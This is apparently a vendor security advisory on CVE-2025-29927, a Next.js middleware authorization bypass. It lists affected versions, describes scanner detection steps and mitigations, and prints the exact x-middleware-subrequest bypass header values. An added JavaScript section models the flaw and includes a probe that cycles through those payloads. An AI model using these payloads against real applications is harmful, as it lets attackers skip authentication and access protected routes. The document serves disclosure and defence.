A critical vulnerability in the Next.js framework, formally disclosed on March 21, 2025, allows attackers to bypass middleware security controls through a simple header manipulation. This post summarizes what we know about CVE-2025-29927, how to mitigate the vulnerability, and how Acunetix can help you detect and confirm your organization's risk.
What you need to know about CVE-2025-29927
- A remote authorization bypass vulnerability identified as CVE-2025-29927 was confirmed in Next.js, one of the most popular React frameworks used to build web applications.
- The vulnerability allows attackers to completely bypass Next.js middleware in an application, including commonly used critical security functions such as authentication and authorization.
- As of March 24, 2025, Acunetix has an active security check to detect and report exploitable Next.js versions.
- The vulnerability affects the following Next.js versions:
- Next.js 11.1.4 through 13.5.6 (no fixed release existed for these branches at the time of disclosure; see the mitigation section for the 12.3.5 and 13.5.9 releases)
- Next.js 14.x before 14.2.25
- Next.js 15.x before 15.2.3
- Upgrading to a non-vulnerable version is the only guaranteed fix. Blocking the header at a proxy or WAF may work as a stopgap but is not recommended as a long-term solution.
Understand your Next.js middleware bypass risk
The vulnerability allows attackers to completely bypass middleware by including a specially crafted x-middleware-subrequest header in their requests. You can think of middleware as a processing chain that lets software modules inspect, modify, or reroute an HTTP request before it reaches its final handler. It is a natural place to enforce things like authentication, and one very common pattern is to have middleware redirect to a login page if no valid authentication cookie is found.
This vulnerability is particularly concerning because Next.js middleware is often used for critical security functions such as authentication, authorization, path rewriting, and setting security headers. All of these can be trivially bypassed by an attacker simply by adding one HTTP header to the request.
Are you vulnerable to the Next.js middleware bypass?
If your answer to BOTH of the following questions is "yes", your application is vulnerable unless patched:
- Do you rely on Next.js middleware for security controls?
- Are you running a self-hosted Next.js application, i.e. served with next start or built with output: "standalone"?
Applications are particularly at risk if:
- You use middleware for authentication or authorization checks
- You rely on middleware to set security headers such as Content Security Policy (CSP), which restricts where resources are permitted to be loaded from
- You use middleware for path rewriting to restrict access to certain routes
Applications hosted on Vercel or Netlify are not affected, as these platforms have implemented mitigations at their edge layers. Applications deployed as static exports (where middleware is not executed) are also not affected.
If you don't know the details of your Next.js usage or want to assess it independently, running an automated DAST tool to confirm whether you are vulnerable is a good starting point.
How the Next.js middleware vulnerability works
Next.js middleware uses an internal header called x-middleware-subrequest to prevent recursive requests from triggering infinite loops. The vulnerability is that this header is honored even when it arrives from the client, so an attacker can set it to make the Next.js application skip middleware execution entirely.
The exploit payload differs slightly between Next.js versions:
- For older versions (pre-12.2):
x-middleware-subrequest: pages/_middleware
- For modern versions:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
(or src/middleware:src/middleware:src/middleware:src/middleware:src/middleware if the project uses the src directory)
When this header is present with the appropriate value, the middleware is skipped completely, allowing the request to reach its original destination without any of the security checks or modifications the middleware would have applied.
How Invicti DAST products detect CVE-2025-29927
Active detection logic (Acunetix)
Invicti's security research team has developed a check for the Acunetix engine to detect whether your applications are vulnerable to CVE-2025-29927. As of Monday, March 24, 2025, this check is live for all Acunetix Premium customers.
Here is how the active check works, step by step:
- Identify Next.js middleware usage: The check first looks for the telltale sign of a Next.js middleware redirect, namely a 307 response whose body equals the value of the Location header. This pattern is characteristic of Next.js middleware redirects.
- Verify that the Next.js framework is present: Confirm the application is using Next.js by checking for the
x-powered-by: Next.js
header in responses.
- Test with bypass payloads: The check tries different bypass payloads depending on the likely Next.js version:
- For newer versions (13.2.0+):
middleware:middleware:middleware:middleware:middleware
(and the src/middleware variant)
- For intermediate versions (12.2 to 13.2.0):
middleware
- For older versions (pre-12.2):
pages/_middleware
- Validation by contrast: To avoid false positives, the check performs several validation steps:
- Send a request with the candidate bypass header and check whether it returns 200 OK instead of the redirect.
- Send a control request with a slightly altered header name, such as
Y-Middleware-Subrequest
, to confirm that it still redirects (307).
- Send another request with an invalid header value to confirm that the redirect still occurs.
- Repeat the successful bypass request to ensure the result is consistent.
- Confirm the vulnerability: Only after all validation steps pass is the vulnerability reported, reducing the risk of false positives.
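To make both the mechanism (the section "How the Next.js middleware vulnerability works") and the active check above concrete, here is an added example in plain JavaScript. It is not Next.js source code and not Invicti's scanner code. It models the x-middleware-subrequest skip logic in two simplified modes inferred from the payload shapes: a "legacy" mode that skips when the middleware's own name appears anywhere in the colon-separated header, and a "modern" mode that skips once the name appears five times. It then places a toy cookie-based auth middleware behind that logic and runs the validation-by-contrast probe (baseline redirect, bypass, misnamed header, junk value, repeat) against it, finishing with the edge-level mitigation of stripping the header before it reaches the app. The MAX_RECURSION_DEPTH constant, the middleware names, the fake app, and the /dashboard path are assumptions for illustration.

```javascript
// Added example: a simplified model of the x-middleware-subrequest skip logic,
// a toy auth middleware, and the validation-by-contrast probe. Not Next.js
// source and not Invicti's scanner code; constants and names are assumptions.
const MAX_RECURSION_DEPTH = 5; // assumed: modern payloads repeat the name 5 times

function subrequestChain(headers) {
  const raw = headers['x-middleware-subrequest'];
  return typeof raw === 'string' && raw.length > 0 ? raw.split(':') : [];
}

// Skip decision. 'legacy' models the older behaviour (name present at all);
// 'modern' models a recursion counter that trips at MAX_RECURSION_DEPTH.
function skipsMiddleware(headers, middlewareName, mode) {
  const chain = subrequestChain(headers);
  if (mode === 'legacy') return chain.includes(middlewareName);
  return chain.filter((name) => name === middlewareName).length >= MAX_RECURSION_DEPTH;
}

// Toy auth middleware: redirect to /login unless a session cookie is present.
// The 307 whose body equals the Location header mimics the fingerprint the
// active check looks for.
function authMiddleware(request) {
  if (!/(^|;\s*)session=/.test(request.headers.cookie || '')) {
    return { status: 307, headers: { location: '/login', 'x-powered-by': 'Next.js' }, body: '/login' };
  }
  return null; // fall through to the route handler
}

// Fake self-hosted app: lowercases header names, consults the skip logic,
// runs the middleware unless told to skip, then serves the protected route.
function makeApp({ middlewareName, mode }) {
  return function handle(request) {
    const headers = Object.fromEntries(
      Object.entries(request.headers || {}).map(([k, v]) => [k.toLowerCase(), v]),
    );
    const req = { ...request, headers };
    if (!skipsMiddleware(headers, middlewareName, mode)) {
      const early = authMiddleware(req);
      if (early) return early;
    }
    return { status: 200, headers: { 'x-powered-by': 'Next.js' }, body: 'secret dashboard' };
  };
}

// Payloads in the order the post lists them for the active check.
const PAYLOADS = [
  'middleware:middleware:middleware:middleware:middleware',
  'src/middleware:src/middleware:src/middleware:src/middleware:src/middleware',
  'middleware',
  'pages/_middleware',
];

function isMiddlewareRedirect(res) {
  return res.status === 307 && typeof res.headers.location === 'string' && res.body === res.headers.location;
}

// The probe. `send` is whatever issues a request and returns a response
// (here the fake app; against a real target it would be an HTTP client).
// Returns the payload that bypassed middleware, or null if not confirmed.
function probe(send, path) {
  const baseline = send({ path, headers: {} });
  if (!isMiddlewareRedirect(baseline) || baseline.headers['x-powered-by'] !== 'Next.js') return null;
  for (const payload of PAYLOADS) {
    const bypass = send({ path, headers: { 'x-middleware-subrequest': payload } });
    if (bypass.status !== 200) continue;
    // Controls: a misnamed header and a junk value must still redirect,
    // and the bypass must be repeatable.
    const wrongName = send({ path, headers: { 'y-middleware-subrequest': payload } });
    const wrongValue = send({ path, headers: { 'x-middleware-subrequest': 'not-a-middleware' } });
    const again = send({ path, headers: { 'x-middleware-subrequest': payload } });
    if (isMiddlewareRedirect(wrongName) && isMiddlewareRedirect(wrongValue) && again.status === 200) {
      return payload;
    }
  }
  return null;
}

// Edge-level mitigation: drop the header before the request reaches the app.
function stripHeaderAtEdge(app) {
  return (request) => {
    const headers = {};
    for (const [k, v] of Object.entries(request.headers || {})) {
      if (k.toLowerCase() !== 'x-middleware-subrequest') headers[k] = v;
    }
    return app({ ...request, headers });
  };
}

// Demo: three vulnerable configurations, then the same app behind the edge filter.
for (const cfg of [
  { middlewareName: 'middleware', mode: 'modern' },
  { middlewareName: 'src/middleware', mode: 'modern' },
  { middlewareName: 'pages/_middleware', mode: 'legacy' },
]) {
  console.log(cfg.middlewareName, '->', probe(makeApp(cfg), '/dashboard'));
}
console.log('behind edge filter ->', probe(stripHeaderAtEdge(makeApp({ middlewareName: 'middleware', mode: 'modern' })), '/dashboard'));
```

Two points worth noticing when running it: the five-times payload also satisfies the legacy includes() check, which is why a scanner can try it first against any 12.2+ target, and the controls matter because a route that returns 200 to everyone would otherwise look like a successful bypass. The stripHeaderAtEdge wrapper is the shape of the proxy-level stopgap discussed under mitigation; it only helps if it sits in front of the application, not inside the middleware that is being skipped.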
Passive detection through traffic analysis with dynamic SCA (Invicti)
The vulnerability can also be detected by passively monitoring web traffic during a security scan, without sending any additional requests. Invicti Enterprise uses this approach together with its vulnerability database. The passive check looks for the x-powered-by: Next.js
header in responses, which confirms the application is using Next.js. The exact version is then obtained by evaluating next.version in the browser's JavaScript context.
That value is compared against our continuously updated database of known CVEs and detection signatures to determine whether a vulnerable version of Next.js has been encountered.
As of Tuesday, March 25, 2025, this check is live for all Invicti Enterprise, Invicti Standard, and Acunetix 360 customers.
Mitigation steps for CVE-2025-29927
- Update immediately:
- For Next.js 15.x: update to ≥ 15.2.3
- For Next.js 14.x: update to ≥ 14.2.25
- For Next.js 13.x: update to ≥ 13.5.9
- For Next.js 12.x: update to ≥ 12.3.5
- If updating is not possible right away:
- Strip or block the
x-middleware-subrequest
header at your edge or reverse proxy, before the request reaches the application (not in the middleware itself, since the middleware is exactly what gets skipped).
- Cloudflare users can enable a Managed WAF rule that blocks this attack. Be aware that Cloudflare has changed this rule to opt-in after reports of third-party authentication frameworks being affected. We recommend focusing on upgrading Next.js.
Invicti Security would like to acknowledge Rachid Allam and Yasser Allam for their original research and writeup of their findings, as well as our internal teams that worked to get a check out to customers within a single business day.
Our security team is continuously monitoring this situation and will provide updates as more information becomes available.